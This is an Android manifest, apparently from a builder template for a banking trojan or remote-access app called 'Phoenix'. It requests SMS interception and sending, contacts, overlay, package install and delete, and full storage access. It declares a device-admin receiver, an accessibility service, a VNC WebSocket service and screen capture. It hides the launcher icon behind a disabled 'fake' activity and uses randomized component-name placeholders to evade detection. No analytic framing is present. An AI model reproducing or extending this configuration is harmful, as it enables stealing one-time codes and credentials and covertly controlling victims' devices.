<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.service.app">

    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
    <uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT" />
    <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"
        tools:ignore="QueryAllPackagesPermission" />
    <uses-permission android:name="android.permission.ACCESS_NOTIFICATION_POLICY" />
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>



    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="REPLACEWITHAPPNAME"
        android:supportsRtl="true"
        android:excludeFromRecents="true"
        android:usesCleartextTraffic="true"
        android:theme="@android:style/Theme.Translucent.NoTitleBar"
        android:requestLegacyExternalStorage="true"
        android:name=".App">

        <activity android:name=".Main.SMSManager" />
        <service
            android:name=".Services.ServiceChooser"
            android:exported="false" />

        <activity
            android:name="com.google.android.gms.common.api.GoogleApiActivity"
            android:exported="false"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" />

        <meta-data
            android:name="com.google.android.gms.version"
            android:value="11010000" />

        <service
            android:name=".Services.DevLock"
            android:exported="false" />

        <activity
            android:name=".Main.AccessAdm"
            android:excludeFromRecents="true"
            android:label=""
            android:theme="@android:style/Theme.NoDisplay" />

        <activity android:name=".CaptureActivity" android:excludeFromRecents="true"
            android:theme="@style/Theme.AppCompat.Translucent" />

        <activity android:label="REPLACEFAKENAME" android:enabled="false" android:launchMode="singleInstance" android:name=".fake" >
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
        </intent-filter>
        </activity>

        <service
            android:name=".CaptureService"
            android:foregroundServiceType="mediaProjection" />
        <service
            android:name=".vnc.WebSocketService"
            android:enabled="true"
            android:exported="false" />

        <service
            android:name=".Services.HintService"
            android:enabled="true"
            android:exported="false" />

        <receiver
            android:name=".Main.ReceiverDeviceAdmin"
            android:label="REPLACEADMINNAME"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/adm" />

            <intent-filter android:priority="121">
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED" />
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>

        <activity android:name=".REPLACERANDOM1">
            <intent-filter>
                <data android:scheme="sms" />
                <action android:name="android.intent.action.SENDTO" />
                <data android:scheme="mms" />
                <category android:name="android.intent.category.BROWSABLE" />
                <data android:scheme="mmsto" />
                <category android:name="android.intent.category.DEFAULT" />
                <data android:scheme="smsto" />
                <action android:name="android.intent.action.SEND" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".REPLACERANDOM2"
            android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <data android:mimeType="application/vnd.wap.mms-message" />

                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />
            </intent-filter>
        </receiver>

        <service
            android:name=".REPLACERANDOM3"
            android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <data android:scheme="sms" />

                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE" />

                <data android:scheme="smsto" />
            </intent-filter>
        </service>
        <service android:name=".Services.srvToaskAccessibility" />

        <activity
            android:name=".Main.AccessActivity"
            android:icon="@drawable/background"
            android:label=""
            android:excludeFromRecents="true"/>
        <activity
            android:name=".Main.ViewManager"
            android:excludeFromRecents="true"
            android:icon="@drawable/background"
            android:label=""
            android:launchMode="singleTask"
            />
        <activity android:name=".IndexACT" android:enabled="true" android:excludeFromRecents="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.app.role.SMS" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".Main.smsreceiver"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="979">
                <action android:name="android.provider.Telephony.SMS_DELIVER" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />

                <!-- <action android:name="android.intent.action.ACTION_SHUTDOWN" /> -->
            </intent-filter>
        </receiver>

        <provider
            android:name="androidx.core.content.FileProvider"
            android:authorities="${applicationId}.fileprovider"
            android:grantUriPermissions="true"
            android:exported="false">
            <meta-data
                android:name="android.support.FILE_PROVIDER_PATHS"
                android:resource="@xml/file_paths" />
        </provider>


        <activity
            android:name=".Main.PermManager"
            android:excludeFromRecents="true"
            android:icon="@drawable/background"
            android:label=""
            android:theme="@android:style/Theme.NoDisplay" />
        <activity android:name=".Main.ModeChanger" />

        <service android:name="com.service.app.Services.EndlessService" />
        <service android:name="com.service.app.Services.kingservice" />

        <service android:name="com.service.app.Services.Netmanager" />
        <service android:name="com.service.app.Services.SensorService" />
        <service
            android:name=".Services.Access"
            android:label="Phoenix"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/serviceconfig" />
        </service>
    </application>

</manifest>
